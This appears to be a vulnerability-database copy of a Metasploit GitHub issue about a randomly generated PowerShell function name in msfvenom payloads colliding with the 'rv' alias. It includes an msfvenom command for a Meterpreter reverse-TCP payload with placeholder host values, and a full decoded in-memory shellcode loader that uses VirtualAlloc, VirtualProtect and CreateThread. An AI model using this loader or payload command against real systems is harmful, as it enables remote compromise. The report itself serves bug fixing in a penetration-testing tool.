msfvenom psh-cmd payload's random powershell function name collides with builtin commands

Vulnerability Information

Vulnerability name: msfvenom psh-cmd payload's random powershell function name collides with builtin commands

Vulnerability type: Other

Severity: Medium

Vulnerability description:

Affected product

Metasploit Framework is a widely used penetration testing tool that provides exploit development, testing and execution capabilities. msfvenom is the payload generator in Metasploit, used to create many kinds of malicious code for use in penetration tests. This issue affects the PowerShell command (psh-cmd) payloads that msfvenom generates.

Vulnerability explanation

This is a naming-collision issue: a function name randomly generated in the PowerShell script that msfvenom produces can collide with the alias of a PowerShell built-in command. For example, the rv function mentioned in the report collides with rv, the alias of PowerShell's Remove-Variable cmdlet. Such a collision can cause the script to fail or behave unexpectedly, because PowerShell resolves the built-in alias ahead of a user-defined function of the same name.

Impact analysis

Although this issue does not directly lead to remote code execution or data leakage, it affects the reliability and effectiveness of penetration tests. If a generated script fails to execute because of a name collision, it can hold up the engagement or even expose the testing activity. The problem is especially awkward in automated tooling, because it depends on randomly generated names and is hard to predict and reproduce. It can be triggered without authentication, and in some circumstances automated tools may hit it, causing tests to fail.
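The two points above, the precedence rule that makes a function named rv unreachable and the check a name generator would need to avoid the collision, as an added illustration in PowerShell. This is not code from the issue or from Metasploit; the function names Test-IdentifierCollision and New-SafeIdentifier are assumptions made here, and the loop only generates a harmless identifier string.

```powershell
# Added illustration (not from the issue or from Metasploit).
# Part 1: PowerShell command precedence is Alias > Function > Cmdlet > Application,
# so defining a function whose name equals an existing alias does not shadow it.
function rv {
    param([Type[]]$Signature)
    return "user-defined rv called with $($Signature.Count) parameter types"
}

# Without -All, Get-Command returns only the highest-precedence match for the name.
$resolved = Get-Command -Name rv
"{0} -> {1}" -f $resolved.CommandType, $resolved.ResolvedCommand.Name

# With -All, both the built-in alias and the freshly defined function are listed;
# a bare call to 'rv' still dispatches to the alias.
Get-Command -Name rv -All | Select-Object Name, CommandType, Source

# Part 2: a collision check that a script generator could apply before emitting
# an identifier (the names below are assumptions, not a Metasploit API).
function Test-IdentifierCollision {
    param([Parameter(Mandatory)][string]$Name)
    # Get-Command sees aliases, functions, cmdlets and applications on PATH;
    # any non-null result means the candidate would be shadowed or ambiguous.
    return $null -ne (Get-Command -Name $Name -ErrorAction SilentlyContinue)
}

function New-SafeIdentifier {
    param([int]$Length = 4, [int]$MaxTries = 100)
    # Letters only, so the candidate can never contain a wildcard character
    # that Get-Command would interpret as a pattern.
    $alphabet = [char[]]'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    for ($try = 0; $try -lt $MaxTries; $try++) {
        $candidate = -join (1..$Length | ForEach-Object { $alphabet | Get-Random })
        if (-not (Test-IdentifierCollision -Name $candidate)) { return $candidate }
    }
    throw "no collision-free identifier found in $MaxTries attempts"
}

Test-IdentifierCollision -Name 'rv'      # collides: built-in alias of Remove-Variable
Test-IdentifierCollision -Name 'xSb5N'   # the report's other generated name
New-SafeIdentifier
```

Test-IdentifierCollision checks the session it runs in, so it covers the built-in aliases (rv among them) but not aliases or functions that a particular target profile adds; a generator that cannot run PowerShell at generation time would instead carry a static list of the default alias and cmdlet names and reject candidates against that.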

Vendor: rapid7

Product: metasploit-framework

Affected version: 6.4.68

Source: https://github.com/rapid7/metasploit-framework/issues/20331

Type: rapid7/metasploit-framework:github issues

Source summary

Steps to reproduce

How’d you do it?

  1. msfvenom -p windows/x64/meterpreter/reverse_tcp -f psh-cmd LHOST=x.x.x.x LPORT=xxx
  2. Unwrap the base64 part inside the payload to reveal the actual powershell script
  3. Unwrap the compression and base64 part once more
  4. Now we get the actual evil powershell script that loads the shellcode
  5. Notice variables and functions have random names

Were you following a specific guide/tutorial or reading documentation?

No

Expected behavior

Variable and function names shouldn't collide with existing ones.

Current behavior

There’s a chance that it will collide. In my case:

function xSb5N {
Param ($nmO, $u3F)
$rZx = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

return $rZx.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($rZx.GetMethod('GetModuleHandle')).Invoke($null, @($nmO)))), $u3F))
}

function rv {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $hepi,
[Parameter(Position = 1)] [Type] $tB3YT = [Void]
)

$qI = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$qI.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $hepi).SetImplementationFlags('Runtime, Managed')
$qI.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tB3YT, $hepi).SetImplementationFlags('Runtime, Managed')

return $qI.CreateType()
}

[Byte[]]$wU7 = [System.Convert]::FromBase64String("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")
[Uint32]$xMiq = 0
$wqX = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll VirtualAlloc), (rv @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $wU7.Length,0x3000, 0x04)

[System.Runtime.InteropServices.Marshal]::Copy($wU7, 0, $wqX, $wU7.length)
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll VirtualProtect), (rv @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($wqX, [Uint32]$wU7.Length, 0x10, [Ref]$xMiq)) -eq $true) {
$a9ffs = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll CreateThread), (rv @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$wqX,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll WaitForSingleObject), (rv @([IntPtr], [Int32]))).Invoke($a9ffs,0xffffffff) | Out-Null
}

2nd function collides with Remove-Variable's short name: rv

Metasploit version

6.4.68

Additional Information

None

http://example.com/2025/07/15/github_224117259/
Author
lianccc
Published
July 15, 2025
License